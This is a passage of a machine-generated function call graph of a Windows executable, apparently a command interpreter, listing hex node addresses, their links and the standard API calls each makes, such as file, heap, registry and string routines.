7ff7e1dcd832 18525->18527 18635 7ff7e1ddbde4 EnterCriticalSection LeaveCriticalSection 18527->18635 18530 7ff7e1dbdfe2 18529->18530 18531 7ff7e1dbdf93 18529->18531 18533 7ff7e1dbe00b _setjmp 18530->18533 18534 7ff7e1dbe100 VirtualFree 18530->18534 18531->18530 18532 7ff7e1dbdf9f GetProcessHeap RtlFreeHeap 18531->18532 18532->18530 18532->18531 18535 7ff7e1dbe04a 18533->18535 18543 7ff7e1dbe0c3 18533->18543 18534->18530 18636 7ff7e1dbe600 18535->18636 18537 7ff7e1dbe073 18538 7ff7e1dbe081 18537->18538 18539 7ff7e1dbe0e0 longjmp 18537->18539 18645 7ff7e1dbd250 18538->18645 18541 7ff7e1dbe0b0 18539->18541 18541->18543 18676 7ff7e1ddd3fc 18541->18676 18543->18442 18546 7ff7e1dbe600 473 API calls 18547 7ff7e1dbe0a7 18546->18547 18547->18541 18548 7ff7e1ddd610 167 API calls 18547->18548 18548->18541 18550 7ff7e1ddc036 18549->18550 18551 7ff7e1ddc047 18549->18551 18552 7ff7e1db3240 166 API calls 18550->18552 18553 7ff7e1ddc6db 18551->18553 18556 7ff7e1ddc067 18551->18556 18559 7ff7e1dc3448 166 API calls 18551->18559 18554 7ff7e1ddc042 18552->18554 18555 7ff7e1dc8f80 7 API calls 18553->18555 18968 7ff7e1dc58e4 EnterCriticalSection LeaveCriticalSection 18554->18968 18558 7ff7e1ddc6eb 18555->18558 18560 7ff7e1dc081c 166 API calls 18556->18560 18562 7ff7e1ddc070 18556->18562 18558->18475 18559->18556 18560->18562 18561 7ff7e1dc417c 166 API calls 18563 7ff7e1ddc0d1 18561->18563 18562->18561 18969 7ff7e1ddbf84 18563->18969 18566 7ff7e1ddc673 18567 7ff7e1dc33f0 _vsnwprintf 18566->18567 18568 7ff7e1ddc696 18567->18568 18570 7ff7e1dc34a0 166 API calls 18568->18570 18569 7ff7e1ddc1c5 towupper 18571 7ff7e1ddc11a 18569->18571 18572 7ff7e1ddc6ce 18570->18572 18571->18568 18571->18569 18573 7ff7e1dc33f0 _vsnwprintf 18571->18573 18574 7ff7e1dc3140 166 API calls 18571->18574 18576 7ff7e1db6ee4 166 API calls 18571->18576 18579 7ff7e1ddc2db GetDriveTypeW 18571->18579 18580 7ff7e1dc33f0 _vsnwprintf 18571->18580 18582 7ff7e1ddc3ab 18571->18582 18973 7ff7e1db586c GetVersion 18571->18973 18978 7ff7e1dc885c FormatMessageW 18571->18978 18572->18553 18979 7ff7e1dc58e4 EnterCriticalSection LeaveCriticalSection 18572->18979 18573->18571 18574->18571 18576->18571 18579->18571 18581 7ff7e1ddc5c8 LocalFree 18580->18581 18581->18571 18583 7ff7e1dc33f0 _vsnwprintf 18582->18583 18584 7ff7e1ddc3bd 18583->18584 18584->18475 18593 7ff7e1dd77bc 18585->18593 18586 7ff7e1dd79c0 18598 7ff7e1dc34a0 166 API calls 18586->18598 18587 7ff7e1dd7aca 18588 7ff7e1dc34a0 166 API calls 18587->18588 18591 7ff7e1dd7adb 18588->18591 18590 7ff7e1dd7ab5 18597 7ff7e1dc3448 166 API calls 18590->18597 18595 7ff7e1dd7af0 18591->18595 18599 7ff7e1dc3448 166 API calls 18591->18599 18592 7ff7e1dd7984 18592->18586 18596 7ff7e1dd7989 18592->18596 18593->18586 18593->18587 18593->18590 18593->18592 18594 7ff7e1dd7a00 18593->18594 18593->18596 18606 7ff7e1dd79ef 18593->18606 18610 7ff7e1dc3448 166 API calls 18593->18610 18612 7ff7e1dd778c 166 API calls 18593->18612 18602 7ff7e1dd7a0b 18594->18602 18594->18606 18613 7ff7e1dd7a33 18594->18613 18600 7ff7e1dd778c 166 API calls 18595->18600 18596->18606 18987 7ff7e1dd76e0 18596->18987 18597->18606 18601 7ff7e1dd79d6 18598->18601 18599->18595 18603 7ff7e1dd7afb 18600->18603 18604 7ff7e1dc3448 166 API calls 18601->18604 18615 7ff7e1dd79e7 18601->18615 18602->18606 18607 7ff7e1dc34a0 166 API calls 18602->18607 18603->18596 18608 7ff7e1dc3448 166 API calls 18603->18608 18604->18615 18606->18475 18611 7ff7e1dd7a23 18607->18611 18608->18596 18609 7ff7e1dc3448 166 API calls 18609->18606 18610->18593 18614 7ff7e1dd778c 166 API calls 18611->18614 18612->18593 18613->18609 18614->18615 18983 7ff7e1dd7730 18615->18983 18617 7ff7e1ddc775 18616->18617 18624 7ff7e1ddc7ab 18616->18624 18618 7ff7e1dbcd90 166 API calls 18617->18618 18620 7ff7e1ddc781 18618->18620 18619 7ff7e1ddc8d4 18619->18475 18620->18619 18621 7ff7e1dbb0d8 194 API calls 18620->18621 18621->18619 18622 7ff7e1dbb6b0 170 API calls 18622->18624 18623 7ff7e1dbb038 _dup2 18623->18624 18624->18619 18624->18620 18624->18622 18624->18623 18625 7ff7e1dbd208 _close 18624->18625 18625->18624 18627 7ff7e1ddd63d 18626->18627 18633 7ff7e1ddd635 18626->18633 18628 7ff7e1ddd658 18627->18628 18629 7ff7e1ddd64a 18627->18629 18628->18633 18634 7ff7e1db3278 166 API calls 18628->18634 18630 7ff7e1db3278 166 API calls 18629->18630 18630->18633 18631 7ff7e1ddd672 longjmp 18632 7ff7e1dcc9da 18631->18632 18632->18450 18632->18452 18633->18631 18633->18632 18634->18633 18637 7ff7e1dbe60f 18636->18637 18694 7ff7e1dbef40 18637->18694 18639 7ff7e1dbe626 18640 7ff7e1dcccca longjmp 18639->18640 18641 7ff7e1dbe637 18639->18641 18640->18641 18642 7ff7e1dc3448 166 API calls 18641->18642 18643 7ff7e1dbe65f 18641->18643 18644 7ff7e1dcccfe 18642->18644 18643->18537 18644->18537 18646 7ff7e1dbd267 18645->18646 18651 7ff7e1dbd2d3 18645->18651 18647 7ff7e1dbd284 _wcsicmp 18646->18647 18652 7ff7e1dbd2a6 18646->18652 18648 7ff7e1dbd32b 18647->18648 18647->18652 18650 7ff7e1dbe600 473 API calls 18648->18650 18648->18652 18649 7ff7e1dbe600 473 API calls 18649->18651 18650->18648 18651->18646 18651->18649 18653 7ff7e1dbd305 18651->18653 18654 7ff7e1dbd316 18652->18654 18655 7ff7e1dbef40 472 API calls 18652->18655 18653->18654 18656 7ff7e1dbe600 473 API calls 18653->18656 18654->18541 18654->18546 18662 7ff7e1dbedf8 18655->18662 18656->18646 18657 7ff7e1dcd0a2 longjmp 18658 7ff7e1dcd0c5 18657->18658 18659 7ff7e1dc3448 166 API calls 18658->18659 18660 7ff7e1dcd0d4 18659->18660 18661 7ff7e1dbeece 18661->18654 18665 7ff7e1dbcd90 166 API calls 18661->18665 18662->18657 18662->18658 18663 7ff7e1dbee68 18662->18663 18670 7ff7e1dbeeb1 18662->18670 18664 7ff7e1dbef40 472 API calls 18663->18664 18664->18654 18666 7ff7e1dbeee7 18665->18666 18668 7ff7e1dbef31 18666->18668 18669 7ff7e1dbeeef 18666->18669 18667 7ff7e1dbe600 473 API calls 18667->18670 18672 7ff7e1dde91c 198 API calls 18668->18672 18671 7ff7e1dbe600 473 API calls 18669->18671 18670->18661 18670->18667 18673 7ff7e1dbeec2 18670->18673 18671->18654 18674 7ff7e1dbef36 18672->18674 18675 7ff7e1dbef40 472 API calls 18673->18675 18674->18657 18675->18661 18692 7ff7e1ddd419 18676->18692 18677 7ff7e1dccadf 18678 7ff7e1ddd576 18679 7ff7e1ddd592 18678->18679 18691 7ff7e1ddd555 18678->18691 18681 7ff7e1dc3448 166 API calls 18679->18681 18680 7ff7e1ddd5c4 18683 7ff7e1dc3448 166 API calls 18680->18683 18685 7ff7e1ddd5a5 18681->18685 18682 7ff7e1ddd541 18682->18679 18688 7ff7e1ddd546 18682->18688 18683->18677 18686 7ff7e1ddd5ba 18685->18686 18689 7ff7e1dc3448 166 API calls 18685->18689 18938 7ff7e1ddd36c 18686->18938 18687 7ff7e1dc3448 166 API calls 18687->18692 18688->18680 18688->18691 18689->18686 18945 7ff7e1ddd31c 18691->18945 18692->18677 18692->18678 18692->18679 18692->18680 18692->18682 18692->18687 18692->18691 18693 7ff7e1ddd3fc 166 API calls 18692->18693 18693->18692 18695 7ff7e1dbef71 18694->18695 18696 7ff7e1dcd1f3 18695->18696 18697 7ff7e1dbf130 18695->18697 18704 7ff7e1dbef87 18695->18704 18696->18639 18698 7ff7e1dc3448 166 API calls 18697->18698 18725 7ff7e1dbf046 18697->18725 18698->18725 18699 7ff7e1dbf433 18726 7ff7e1dbf8c0 EnterCriticalSection LeaveCriticalSection 18699->18726 18700 7ff7e1dbf438 18700->18725 18779 7ff7e1dbf860 18700->18779 18702 7ff7e1dbeff2 iswspace 18702->18704 18705 7ff7e1dbf01f wcschr 18702->18705 18704->18696 18704->18699 18704->18700 18704->18702 18704->18705 18704->18725 18705->18725 18706 7ff7e1dbf860 456 API calls 18706->18725 18707 7ff7e1dbf0c4 iswdigit 18707->18725 18708 7ff7e1dbf1b7 iswspace 18708->18707 18711 7ff7e1dbf1ce wcschr 18708->18711 18709 7ff7e1dbf1fc iswdigit 18709->18725 18710 7ff7e1dbf558 iswspace 18712 7ff7e1dbf6cd wcschr 18710->18712 18710->18725 18711->18707 18711->18709 18712->18725 18713 7ff7e1dbf8c0 456 API calls 18713->18725 18714 7ff7e1dcd1df 18715 7ff7e1db3278 166 API calls 18714->18715 18715->18696 18716 7ff7e1dbf860 456 API calls 18717 7ff7e1dbf632 iswspace 18716->18717 18718 7ff7e1dbf648 wcschr 18717->18718 18717->18725 18719 7ff7e1dbf65f iswdigit 18718->18719 18718->18725 18719->18725 18720 7ff7e1dbf32f iswspace 18722 7ff7e1dbf342 wcschr 18720->18722 18720->18725 18721 7ff7e1dbf2b8 iswdigit 18721->18725 18722->18721 18722->18725 18723 7ff7e1dbf3d2 iswspace 18724 7ff7e1dbf3e9 wcschr 18723->18724 18723->18725 18724->18725 18725->18639 18725->18706 18725->18707 18725->18708 18725->18709 18725->18710 18725->18713 18725->18714 18725->18716 18725->18720 18725->18721 18725->18723 18750 7ff7e1dbf934 18726->18750 18727 7ff7e1dbf94a EnterCriticalSection LeaveCriticalSection 18731 7ff7e1dbf994 _get_osfhandle 18727->18731 18727->18750 18728 7ff7e1dbfb46 18784 7ff7e1dbfc30 GetProcessHeap HeapAlloc 18728->18784 18729 7ff7e1db3240 166 API calls 18729->18750 18730 7ff7e1ddbfec 176 API calls 18730->18750 18733 7ff7e1dc0010 9 API calls 18731->18733 18733->18750 18735 7ff7e1dbfb52 18735->18700 18736 7ff7e1dcd3fa EnterCriticalSection LeaveCriticalSection longjmp 18736->18750 18737 7ff7e1dbfbe6 GetLastError 18755 7ff7e1dbfa42 18737->18755 18738 7ff7e1dcd388 _get_osfhandle 18740 7ff7e1dc0010 9 API calls 18738->18740 18739 7ff7e1dc01b8 6 API calls 18739->18750 18740->18750 18741 7ff7e1dcd3b6 GetLastError 18741->18750 18741->18755 18742 7ff7e1dde9b4 197 API calls 18743 7ff7e1dcd474 longjmp 18742->18743 18743->18750 18744 7ff7e1dcd2ac 18820 7ff7e1ddbf2c _get_osfhandle 18744->18820 18745 7ff7e1dcd2c7 EnterCriticalSection LeaveCriticalSection _get_osfhandle 18747 7ff7e1dd7f00 357 API calls 18745->18747 18747->18750 18748 7ff7e1dbfa80 wcschr 18748->18750 18749 7ff7e1dcd32e GetLastError 18749->18750 18750->18727 18750->18728 18750->18729 18750->18730 18750->18731 18750->18736 18750->18737 18750->18738 18750->18739 18750->18741 18750->18742 18750->18744 18750->18745 18750->18748 18750->18749 18751 7ff7e1dc3448 166 API calls 18750->18751 18752 7ff7e1dc3448 166 API calls 18750->18752 18754 7ff7e1dbfbd4 18750->18754 18750->18755 18756 7ff7e1dbfaf0 18750->18756 18819 7ff7e1ddf318 _get_osfhandle GetFileType 18750->18819 18753 7ff7e1dcd34d longjmp 18751->18753 18752->18750 18753->18750 18754->18728 18762 7ff7e1dbfbe1 18754->18762 18755->18700 18757 7ff7e1dc01b8 6 API calls 18756->18757 18758 7ff7e1dbfb0a 18757->18758 18758->18728 18761 7ff7e1dbfb0e _get_osfhandle SetFilePointer 18758->18761 18759 7ff7e1dcd4ee 18760 7ff7e1db3278 166 API calls 18759->18760 18766 7ff7e1dcd4fb 18760->18766 18761->18728 18767 7ff7e1dcd533 18761->18767 18762->18759 18763 7ff7e1dcd4dd 18762->18763 18764 7ff7e1ddbfec 176 API calls 18762->18764 18765 7ff7e1db3278 166 API calls 18763->18765 18768 7ff7e1dcd4c9 18764->18768 18769 7ff7e1dcd4e9 18765->18769 18770 7ff7e1dcd514 longjmp 18766->18770 18773 7ff7e1dc01b8 6 API calls 18766->18773 18767->18728 18775 7ff7e1dc34a0 166 API calls 18767->18775 18771 7ff7e1dc3448 166 API calls 18768->18771 18772 7ff7e1dde91c 198 API calls 18769->18772 18770->18755 18774 7ff7e1dcd4d1 18771->18774 18772->18759 18776 7ff7e1dcd50b 18773->18776 18777 7ff7e1dc3448 166 API calls 18774->18777 18775->18728 18776->18770 18825 7ff7e1ddf4a8 18776->18825 18777->18763 18782 7ff7e1dbf871 18779->18782 18780 7ff7e1dbf8c0 456 API calls 18783 7ff7e1dcd203 18780->18783 18781 7ff7e1dbf881 18781->18725 18782->18780 18782->18781 18785 7ff7e1dbfc6a 18784->18785 18786 7ff7e1dcd55c 18784->18786 18787 7ff7e1dcd571 memset longjmp 18785->18787 18802 7ff7e1dbfca2 18785->18802 18788 7ff7e1db3278 166 API calls 18786->18788 18790 7ff7e1dbfce7 18787->18790 18789 7ff7e1dcd566 18788->18789 18789->18787 18790->18735 18791 7ff7e1dbfd73 18792 7ff7e1dbfd99 18791->18792 18793 7ff7e1dcd638 18791->18793 18794 7ff7e1dbff70 2 API calls 18792->18794 18795 7ff7e1db3278 166 API calls 18793->18795 18797 7ff7e1dbfda1 18794->18797 18796 7ff7e1dcd64c 18795->18796 18798 7ff7e1dbff70 2 API calls 18796->18798 18797->18735 18799 7ff7e1dcd654 longjmp 18798->18799 18803 7ff7e1dbff4f 18799->18803 18802->18790 18802->18791 18802->18802 18802->18803 18804 7ff7e1dcd609 18802->18804 18810 7ff7e1dcd5b5 memmove 18802->18810 18833 7ff7e1dc18d4 18802->18833 18907 7ff7e1dbd840 GetProcessHeap HeapAlloc 18802->18907 18805 7ff7e1dcd6db AcquireSRWLockShared ReadFile ReleaseSRWLockShared 18803->18805 18807 7ff7e1dc0167 MultiByteToWideChar 18803->18807 18808 7ff7e1dc0131 SetFilePointer 18803->18808 18806 7ff7e1db3278 166 API calls 18804->18806 18813 7ff7e1dc0190 18805->18813 18811 7ff7e1dcd615 18806->18811 18807->18813 18808->18803 18812 7ff7e1db3278 166 API calls 18810->18812 18814 7ff7e1dbff70 2 API calls 18811->18814 18815 7ff7e1dcd5e6 18812->18815 18813->18735 18816 7ff7e1dcd61f longjmp 18814->18816 18817 7ff7e1dbff70 2 API calls 18815->18817 18816->18793 18818 7ff7e1dcd5f0 longjmp 18817->18818 18818->18804 18819->18750 18821 7ff7e1dd8450 367 API calls 18820->18821 18823 7ff7e1ddbf59 18821->18823 18822 7ff7e1ddbf6b GetLastError 18823->18822 18824 7ff7e1ddbf62 18823->18824 18824->18755 18826 7ff7e1ddf4c1 GetStdHandle 18825->18826 18827 7ff7e1dd8450 367 API calls 18826->18827 18828 7ff7e1ddf4ea 18827->18828 18829 7ff7e1ddf4ee wcschr 18828->18829 18830 7ff7e1ddf509 18828->18830 18829->18826 18829->18830 18831 7ff7e1dc8f80 7 API calls 18830->18831 18832 7ff7e1ddf519 18831->18832 18832->18770 18834 7ff7e1dc1935 18833->18834 18835 7ff7e1dc193b 18833->18835 18834->18835 18836 7ff7e1dc19a1 18834->18836 18837 7ff7e1dc195a 18835->18837 18838 7ff7e1dc1946 wcsrchr 18835->18838 18840 7ff7e1dc2e44 memset malloc 18836->18840 18880 7ff7e1dcdbda 18836->18880 18839 7ff7e1dc8f80 7 API calls 18837->18839 18838->18837 18842 7ff7e1dc1978 18839->18842 18860 7ff7e1dc19cf 18840->18860 18841 7ff7e1dcdbdf longjmp 18843 7ff7e1dcdbf3 ??_V@YAXPEAX 18841->18843 18842->18802 18844 7ff7e1dcdbff ??_V@YAXPEAX 18843->18844 18844->18837 18845 7ff7e1dc1a21 18848 7ff7e1dcdc3c wcschr 18845->18848 18849 7ff7e1dc1a3c wcsrchr 18845->18849 18857 7ff7e1dc1dfe 18845->18857 18846 7ff7e1dc19f3 towlower wcsrchr 18846->18845 18847 7ff7e1dc1af6 wcsrchr 18846->18847 18853 7ff7e1dc1b11 towlower 18847->18853 18847->18857 18851 7ff7e1dcdcd2 18848->18851 18852 7ff7e1dcdc5d 18848->18852 18850 7ff7e1dc1a54 wcsrchr 18849->18850 18849->18857 18850->18851 18854 7ff7e1dc1a71 18850->18854 18851->18844 18856 7ff7e1db3278 166 API calls 18851->18856 18855 7ff7e1dbcd90 166 API calls 18852->18855 18853->18857 18853->18860 18863 7ff7e1dbb900 166 API calls 18854->18863 18870 7ff7e1dc1a95 18854->18870 18866 7ff7e1dcdc75 18855->18866 18859 7ff7e1dcdcef longjmp 18856->18859 18857->18848 18857->18851 18858 7ff7e1dc1d74 18858->18837 18867 7ff7e1dc1d7d ??_V@YAXPEAX 18858->18867 18862 7ff7e1dcdd03 18859->18862 18860->18845 18860->18846 18860->18857 18860->18880 18861 7ff7e1dcdccd 18861->18844 18868 7ff7e1dcdd3b 18862->18868 18869 7ff7e1dcdd0c SearchPathW 18862->18869 18863->18870 18864 7ff7e1dc1acf 18871 7ff7e1dbb900 166 API calls 18864->18871 18865 7ff7e1dc1b64 18865->18862 18873 7ff7e1dc1b76 GetFullPathNameW 18865->18873 18872 7ff7e1dc3a90 170 API calls 18866->18872 18866->18880 18867->18837 18877 7ff7e1dcdd5c wcsrchr 18868->18877 18869->18868 18870->18858 18870->18864 18870->18865 18870->18880 18874 7ff7e1dc1ad7 ??_V@YAXPEAX 18871->18874 18875 7ff7e1dcdc98 18872->18875 18876 7ff7e1dc2978 13 API calls 18873->18876 18874->18837 18878 7ff7e1dbff70 GetProcessHeap RtlFreeHeap 18875->18878 18879 7ff7e1dc1ba7 wcsrchr 18876->18879 18882 7ff7e1dcdd73 18877->18882 18878->18880 18879->18877 18881 7ff7e1dc1bc9 18879->18881 18880->18837 18880->18841 18880->18861 18881->18858 18883 7ff7e1dc1bda memset 18881->18883 18884 7ff7e1dcdd8c 18882->18884 18885 7ff7e1dcdd78 longjmp 18882->18885 18886 7ff7e1dbca40 17 API calls 18883->18886 18884->18843 18884->18844 18885->18884 18887 7ff7e1dc1c23 18886->18887 18887->18882 18888 7ff7e1dcdda8 GetFileAttributesExW 18887->18888 18900 7ff7e1dc1c4f 18887->18900 18889 7ff7e1dcdfd0 18888->18889 18891 7ff7e1dcddc5 18888->18891 18889->18802 18890 7ff7e1dbb900 166 API calls 18892 7ff7e1dc1d52 18890->18892 18893 7ff7e1dcdf34 18891->18893 18897 7ff7e1dd85d0 8 API calls 18891->18897 18892->18858 18896 7ff7e1dc1d68 ??_V@YAXPEAX 18892->18896 18898 7ff7e1dcdf4d 18893->18898 18893->18900 18894 7ff7e1dc1d09 18894->18890 18895 7ff7e1dce035 18894->18895 18896->18858 18899 7ff7e1dcde3f 18897->18899 18901 7ff7e1de08ec 9 API calls 18898->18901 18903 7ff7e1db6ee4 166 API calls 18899->18903 18900->18857 18900->18894 18902 7ff7e1dc1cd8 wcsrchr 18900->18902 18901->18889 18902->18895 18904 7ff7e1dc1cf5 18902->18904 18905 7ff7e1dcdeb6 18903->18905 18904->18857 18904->18894 18906 7ff7e1dc3140 166 API calls 18905->18906 18906->18893 18908 7ff7e1dbd8b5 18907->18908 18909 7ff7e1dbdefa 18907->18909 18911 7ff7e1dbdf04 18908->18911 18913 7ff7e1dbd8e5 18908->18913 18910 7ff7e1db3278 166 API calls 18909->18910 18910->18911 18912 7ff7e1dbdf15 longjmp 18911->18912 18937 7ff7e1dbda67 18911->18937 18912->18937 18916 7ff7e1dbd94d GetProcessHeap HeapAlloc 18913->18916 18917 7ff7e1dbdeb6 18913->18917 18913->18937 18914 7ff7e1dbff70 GetProcessHeap RtlFreeHeap 18915 7ff7e1dbdf34 18914->18915 18918 7ff7e1dbff70 GetProcessHeap RtlFreeHeap 18915->18918 18916->18917 18927 7ff7e1dbd97c 18916->18927 18919 7ff7e1db3278 166 API calls 18917->18919 18920 7ff7e1dbdf3c 18918->18920 18921 7ff7e1dbdec5 18919->18921 18920->18802 18922 7ff7e1dbdeda longjmp 18921->18922 18921->18937 18922->18937 18923 7ff7e1dc081c 166 API calls 18923->18927 18924 7ff7e1dbdbce wcstol 18924->18927 18925 7ff7e1dbdaa9 18926 7ff7e1dbde4a 18925->18926 18932 7ff7e1dbdaf3 18925->18932 18925->18937 18928 7ff7e1db3278 166 API calls 18926->18928 18926->18937 18927->18921 18927->18923 18927->18924 18927->18925 18927->18927 18929 7ff7e1dbdc43 18927->18929 18927->18937 18930 7ff7e1dbde69 longjmp 18928->18930 18931 7ff7e1dbdc52 wcstol 18929->18931 18929->18937 18930->18937 18931->18937 18933 7ff7e1dbdb80 _wcsnicmp 18932->18933 18932->18937 18933->18932 18934 7ff7e1dbdd0f 18933->18934 18935 7ff7e1dbdd30 memmove 18934->18935 18936 7ff7e1dbde97 memmove 18934->18936 18935->18937 18936->18917 18937->18914 18939 7ff7e1ddd381 18938->18939 18940 7ff7e1ddd3d8 18938->18940 18941 7ff7e1dc34a0 166 API calls 18939->18941 18943 7ff7e1ddd390 18941->18943 18942 7ff7e1dc3448 166 API calls 18942->18943 18943->18940 18943->18942 18944 7ff7e1dc34a0 166 API calls 18943->18944 18944->18943 18946 7ff7e1dc3448 166 API calls 18945->18946 18947 7ff7e1ddd33b 18946->18947 18948 7ff7e1ddd36c 166 API calls 18947->18948 18949 7ff7e1ddd343 18948->18949 18950 7ff7e1ddd3fc 166 API calls 18949->18950 18967 7ff7e1ddd34e 18950->18967 18951 7ff7e1ddd5c2 18951->18677 18952 7ff7e1ddd576 18953 7ff7e1ddd592 18952->18953 18965 7ff7e1ddd555 18952->18965 18955 7ff7e1dc3448 166 API calls 18953->18955 18954 7ff7e1ddd5c4 18957 7ff7e1dc3448 166 API calls 18954->18957 18959 7ff7e1ddd5a5 18955->18959 18956 7ff7e1ddd541 18956->18953 18962 7ff7e1ddd546 18956->18962 18957->18951 18958 7ff7e1ddd31c 166 API calls 18958->18951 18960 7ff7e1ddd5ba 18959->18960 18963 7ff7e1dc3448 166 API calls 18959->18963 18964 7ff7e1ddd36c 166 API calls 18960->18964 18961 7ff7e1dc3448 166 API calls 18961->18967 18962->18954 18962->18965 18963->18960 18964->18951 18965->18958 18966 7ff7e1ddd3fc 166 API calls 18966->18967 18967->18951 18967->18952 18967->18953 18967->18954 18967->18956 18967->18961 18967->18965 18967->18966 18970 7ff7e1ddbfb5 18969->18970 18971 7ff7e1ddbf99 18969->18971 18970->18553 18970->18566 18970->18571 18972 7ff7e1dc9324 malloc 18971->18972 18972->18970 18980 7ff7e1db58d4 RegOpenKeyExW 18973->18980 18976 7ff7e1dc33f0 _vsnwprintf 18977 7ff7e1db58c2 18976->18977 18977->18571 18978->18571 18981 7ff7e1db5913 RegQueryValueExW RegCloseKey 18980->18981 18982 7ff7e1db588c 18980->18982 18981->18982 18982->18976 18986 7ff7e1dd773c 18983->18986 18984 7ff7e1dd777d 18984->18606 18985 7ff7e1dc3448 166 API calls 18985->18986 18986->18984 18986->18985 18988 7ff7e1dd778c 166 API calls 18987->18988 18989 7ff7e1dd76fb 18988->18989 18990 7ff7e1dd771c 18989->18990 18991 7ff7e1dc3448 166 API calls 18989->18991 18990->18606 18992 7ff7e1dd7711 18991->18992 18993 7ff7e1dd778c 166 API calls 18992->18993 18993->18990 18995 7ff7e1dbc486 18994->18995 18996 7ff7e1dbc4c9 18994->18996 18997 7ff7e1dbc48e wcschr 18995->18997 19001 7ff7e1dbc161 18995->19001 19000 7ff7e1dbff70 2 API calls 18996->19000 18996->19001 18998 7ff7e1dbc4ef 18997->18998 18997->19001 18999 7ff7e1dbcd90 166 API calls 18998->18999 19007 7ff7e1dbc4f9 18999->19007 19000->19001 19001->18118 19001->18126 19002 7ff7e1dbc5bd 19003 7ff7e1dbc541 19002->19003 19005 7ff7e1dbb6b0 170 API calls 19002->19005 19003->19001 19004 7ff7e1dbff70 2 API calls 19003->19004 19004->19001 19005->19003 19006 7ff7e1dbd840 178 API calls 19006->19007 19007->19001 19007->19002 19007->19003 19007->19006 19008->18141 19010 7ff7e1dc3bfe 19009->19010 19012 7ff7e1dc3bcf 19009->19012 19010->18207 19011 7ff7e1dc3bdc wcschr 19011->19010 19011->19012 19012->19010 19012->19011 19014 7ff7e1dc8f80 7 API calls 19013->19014 19015 7ff7e1dc296b 19014->19015 19015->18207 19017 7ff7e1dc2f2a 19016->19017 19018 7ff7e1dc2f97 19016->19018 19019 7ff7e1dc823c 10 API calls 19017->19019 19018->19017 19020 7ff7e1dc2f9c wcschr 19018->19020 19022 7ff7e1dc2f56 19019->19022 19021 7ff7e1dc2fb6 wcschr 19020->19021 19028 7ff7e1dc2f5a 19020->19028 19021->19017 19021->19028 19023 7ff7e1dc3a0c 2 API calls 19022->19023 19022->19028 19024 7ff7e1dc2fe0 19023->19024 19026 7ff7e1dc2fe9 wcsrchr 19024->19026 19024->19028 19025 7ff7e1dc8f80 7 API calls 19027 7ff7e1dc2f83 19025->19027 19026->19028 19027->18207 19028->19025 19029 7ff7e1dce4ec 19028->19029 19031 7ff7e1dd4621 19030->19031 19032 7ff7e1db72de 19030->19032 19036 7ff7e1dd447b longjmp 19031->19036 19039 7ff7e1dd4639 19031->19039 19053 7ff7e1dd47e0 19031->19053 19056 7ff7e1dd475e 19031->19056 19033 7ff7e1db72eb 19032->19033 19037 7ff7e1dd4530 19032->19037 19038 7ff7e1dd4467 19032->19038 19091 7ff7e1db7348 19033->19091 19035 7ff7e1db7348 168 API calls 19077 7ff7e1dd4524 19035->19077 19040 7ff7e1dd4492 19036->19040 19042 7ff7e1db7348 168 API calls 19037->19042 19038->19033 19038->19040 19051 7ff7e1dd4475 19038->19051 19045 7ff7e1dd4695 19039->19045 19046 7ff7e1dd463e 19039->19046 19041 7ff7e1db7348 168 API calls 19040->19041 19063 7ff7e1dd44a8 19041->19063 19065 7ff7e1dd4549 19042->19065 19043 7ff7e1db7315 19106 7ff7e1db73d4 19043->19106 19050 7ff7e1db73d4 168 API calls 19045->19050 19046->19036 19054 7ff7e1dd4654 19046->19054 19047 7ff7e1db7348 168 API calls 19047->19043 19048 7ff7e1db72b0 168 API calls 19057 7ff7e1dd480e 19048->19057 19068 7ff7e1dd469a 19050->19068 19051->19036 19051->19045 19052 7ff7e1db7348 168 API calls 19052->19053 19053->19035 19066 7ff7e1db7348 168 API calls 19054->19066 19055 7ff7e1dd45b2 19059 7ff7e1db7348 168 API calls 19055->19059 19056->19052 19057->18253 19058 7ff7e1db7323 19058->18253 19062 7ff7e1dd45c7 19059->19062 19060 7ff7e1dd455e 19060->19055 19069 7ff7e1db7348 168 API calls 19060->19069 19061 7ff7e1dd46e1 19067 7ff7e1db72b0 168 API calls 19061->19067 19070 7ff7e1db7348 168 API calls 19062->19070 19064 7ff7e1dd44e2 19063->19064 19071 7ff7e1db7348 168 API calls 19063->19071 19072 7ff7e1db72b0 168 API calls 19064->19072 19065->19055 19065->19060 19078 7ff7e1db7348 168 API calls 19065->19078 19066->19058 19073 7ff7e1dd4738 19067->19073 19068->19061 19081 7ff7e1dd46c7 19068->19081 19082 7ff7e1dd46ea 19068->19082 19069->19055 19074 7ff7e1dd45db 19070->19074 19071->19064 19075 7ff7e1dd44f1 19072->19075 19076 7ff7e1db7348 168 API calls 19073->19076 19079 7ff7e1db7348 168 API calls 19074->19079 19080 7ff7e1db72b0 168 API calls 19075->19080 19076->19077 19077->19048 19077->19058 19078->19060 19083 7ff7e1dd45ec 19079->19083 19084 7ff7e1dd4503 19080->19084 19081->19061 19087 7ff7e1db7348 168 API calls 19081->19087 19085 7ff7e1db7348 168 API calls 19082->19085 19086 7ff7e1db7348 168 API calls 19083->19086 19084->19058 19089 7ff7e1db7348 168 API calls 19084->19089 19085->19061 19088 7ff7e1dd4600 19086->19088 19087->19061 19090 7ff7e1db7348 168 API calls 19088->19090 19089->19077 19090->19077 19093 7ff7e1db735d 19091->19093 19092 7ff7e1db3278 166 API calls 19094 7ff7e1dd4820 longjmp 19092->19094 19093->19092 19093->19093 19095 7ff7e1dd4838 19093->19095 19101 7ff7e1db73ab 19093->19101 19094->19095 19096 7ff7e1db3278 166 API calls 19095->19096 19097 7ff7e1dd4844 longjmp 19096->19097 19098 7ff7e1dd485a 19097->19098 19099 7ff7e1db7348 166 API calls 19098->19099 19100 7ff7e1dd487b 19099->19100 19102 7ff7e1db7348 166 API calls 19100->19102 19103 7ff7e1dd48ad 19102->19103 19104 7ff7e1db7348 166 API calls 19103->19104 19105 7ff7e1db72ff 19104->19105 19105->19043 19105->19047 19107 7ff7e1db7401 19106->19107 19108 7ff7e1dd485a 19106->19108 19107->19058 19109 7ff7e1db7348 168 API calls 19108->19109 19110 7ff7e1dd487b 19109->19110 19111 7ff7e1db7348 168 API calls 19110->19111 19112 7ff7e1dd48ad 19111->19112 19113 7ff7e1db7348 168 API calls 19112->19113 19114 7ff7e1dd48be 19113->19114 19114->19058 16742 7ff7e1dc8d80 16743 7ff7e1dc8da4 16742->16743 16744 7ff7e1dc8db6 16743->16744 16745 7ff7e1dc8dbf Sleep 16743->16745 16746 7ff7e1dc8ddb _amsg_exit 16744->16746 16752 7ff7e1dc8de7 16744->16752 16745->16743 16746->16752 16747 7ff7e1dc8e56 _initterm 16749 7ff7e1dc8e73 